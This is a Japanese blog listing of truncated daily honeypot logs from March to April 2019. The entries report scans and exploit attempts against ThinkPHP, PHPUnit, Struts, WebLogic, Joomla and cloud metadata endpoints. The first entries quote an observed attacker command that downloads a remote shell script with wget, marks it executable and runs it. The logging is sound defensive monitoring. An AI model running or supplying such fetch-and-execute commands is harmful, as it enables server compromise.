ハニーポット(仮) 観測記録 2019/04/24分です。ThinkPHPの脆弱性狙いのアクセスがありました。HelloThinkP%\x99\x9e6 と wget http://81[.]6[.]42[.]123/a_thk.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a; の動きでした。総アクセス数：503 (前日比：+471)都…

ハニーポット(仮) 観測記録 2019/04/23分です。非常にアクセス数が少なくなりました。 ZmEuでのスキャンのみがきていたような状態です。thinkphpの脆弱性狙いのリクエストが１件ありました。 以下の動きを狙っているようです。 wget http://81[.]6[.]42[.]12…

ハニーポット(仮) 観測記録 2019/04/22分です。/.env.development へのスキャン行為を確認しました。/libraries/joomla/jmail.php へのスキャン行為が復活してきました。vtiger CRMへのスキャンが始まったようです。 http://www.vtigercrm.jp/総アクセス数：…

ハニーポット(仮) 観測記録 2019/04/21分です。Kazakhstanからのアクセスを観測しました。以前にも観測した以下のアクセスがありました。 \xae\xd0\xab,>\xf9JB2.r\xc2\xd9\xee\x9c\xfe=.\x89\b\x1d\n 意図は不明です。総アクセス数：1068 (前日比：-713)都…

ハニーポット(仮) 観測記録 2019/04/20分です。昨日だけかと思いましたがwww.probethenet.comからのスキャンが続いていました。/xxx/wp-login.php(xxxは適当な文字列)へのアクセスは止まりましたが PHPUnitの脆弱性を狙ったアクセスは続いています。 /Util/P…

ハニーポット(仮) 観測記録 2019/04/19分です。本日はPOSTも検知していました。定期のwww.probethenet.comからのスキャンがやってきました。/xxx/wp-login.php(xxxは適当な文字列)でのスキャン行為が動いているようです。PHPUnitの脆弱性を狙ったアクセスを…

ハニーポット(仮) 観測記録 2019/04/18分です。とても静かな1日でした。 POSTが0件になっているので設定変更の不備な気がしています。総アクセス数：129 (前日比：-634)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件…

ハニーポット(仮) 観測記録 2019/04/17分です。アクセス数が現象し、おとなしくなった印象を受けました。/market/detailへのアクセスを131件確認しました。 Huobi-APIのMarket Dataを取得しようとしているようです。Huobi-API https://github.com/huobiapi H…

ハニーポット(仮) 観測記録 2019/04/16分です。User-AgentがAhrefsBotであるアクセスを確認しました。アクセス数は増加しましたが thinkphpの脆弱性狙い以外に特筆すべき部分はないように思いました。総アクセス数：4338 (前日比：+2468)都合により GET / HT…

ハニーポット(仮) 観測記録 2019/04/15分です。User-Agentがpython-requestsであるアクセスは以前から確認していましたが Windows/2012ServerR2の記載があるものについては初めての観測と思われます。nmapを利用したスキャンと思われるパスへのアクセスを観…

ハニーポット(仮) 観測記録 2019/04/14分です。Czechiaからのアクセスを観測しました。FreePBX向けのアクセスを観測しました。ThinkPHPの脆弱性に対するアクセスは相変わらず継続しています。総アクセス数：1861 (前日比：+670)都合により GET / HTTP/1.1 PO…

ハニーポット(仮) 観測記録 2019/04/13分です。Panamaからのアクセスを観測しました。ThinkPHPの脆弱性狙いのアクセス /PSIA/indexへのアクセス が継続しています。総アクセス数：1191 (前日比：+580)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いてい…

ハニーポット(仮) 観測記録 2019/04/12分です。swproxy.com へアクセスさせようとする動きを観測しました。/PSIA/index 初めてみるディレクトリパスでした。 Wikipediaだと 公安調査庁 (Public Security Intelligence Agency) ということです。総アクセス数…

ハニーポット(仮) 観測記録 2019/04/11分です。アクセス数が減少しています。 大型連休へ向けて一息ついているのでしょうか。Strutsの脆弱性をつくアクセスと思われるリクエストを観測しました。 PHPUnitのリモートコード実行（CVE-2017-9841）を狙うアクセ…

ハニーポット(仮) 観測記録 2019/04/10分です。WordPress Plugin Brandfolderの脆弱性をつくアクセスと思われるリクエストを観測しました。 ExploitDBにコードがありました。 https://www.exploit-db.com/exploits/39591ThinkPHPの脆弱性をつくアクセスも継…

ハニーポット(仮) 観測記録 2019/04/09分です。ThinkPHPの脆弱性狙いのアクセス User-Agentの部分にWOWが入っているアクセス を引き続き確認しています。WebLogic Serverの脆弱性狙いのアクセスを観測しました。フィリピンからのアクセスがありました。総ア…

ハニーポット(仮) 観測記録 2019/04/08分です。HTTPプロトコルの部分にhink（送信元日本） User-Agentの部分にWOW（送信元ルーマニア） が入っているアクセスを確認しました。前者はThinkPHPの脆弱性狙いのアクセスが壊れてしまった結果のようです。 後者は…

ハニーポット(仮) 観測記録 2019/04/07分です。アクセス数は戻ってきました。ThinkPHP狙いのアクセス joomla狙いのアクセス を観測しています。\xae\xd0\xab,>\xf9JB2.r\xc2\xd9\xee\x9c\xfe=.\x89\b\x1d\n については解析しきれませんでした。総アクセス数…

ハニーポット(仮) 観測記録 2019/04/06分です。アクセス数が少ない中、 継続してThinkPHP狙いをのアクセスを観測しています。WordPressのプラグイン、portable phpmyadminへのアクセスも確認しました。総アクセス数：567 (前日比：-1161)都合により GET / HT…

ハニーポット(仮) 観測記録 2019/04/05分です。thinkphp狙いのアクセス 000000000000.cfgへのアクセス が継続しています。マカオ ラトビアからのアクセスを観測しました。総アクセス数：1728 (前日比：+406)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除…

ハニーポット(仮) 観測記録 2019/04/04分です。thinkphp狙いのアクセスが継続しています。meta-data狙いのアクセスがありました。 GET http://169[.]254[.]169[.]254/latest/meta-data こちらの記事にて詳しくまとまっていました。 https://blog.ssrf.in/pos…

ハニーポット(仮) 観測記録 2019/04/03分です。本日もthinkphp狙いのアクセス(エンコードバージョン)を観測しました。000000000000.cfgへのアクセスが継続しています。 本日は269リクエストを観測しました。Turkey（トルコ） Czechia（チェコ） からのアクセ…

ハニーポット(仮) 観測記録 2019/04/02分です。struts2の脆弱性狙いのアクセスを観測しました。thinkphp狙いのアクセスについては継続して観測していますが エンコードされているバージョンでした。000000000000.cfgへのアクセスを200リクエスト以上、観測し…

ハニーポット(仮) 観測記録 2019/04/01分です。Malaysia, Vietnam, Singapore, India など、アジア地域からのアクセスを確認しました。FreePBX向けのアクセスを確認しました。 /a2billing/thinkphpへのアクセスも観測が継続しています。総アクセス数：2750 (…

ハニーポット(仮) 観測記録 2019/03/31分です。thinkphpの脆弱性狙いのアクセスの観測が続いています。 総アクセス数：1550 (前日比：-136)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 1 - -…

ハニーポット(仮) 観測記録 2019/03/30分です。thinkphpの脆弱性狙いのアクセスの観測が続いています。総アクセス数：1686 (前日比：+1232)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 10 11…

ハニーポット(仮) 観測記録 2019/03/29分です。thinkphpの脆弱性狙いのアクセスの観測が続いています。総アクセス数：454 (前日比：-1001)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 10 112…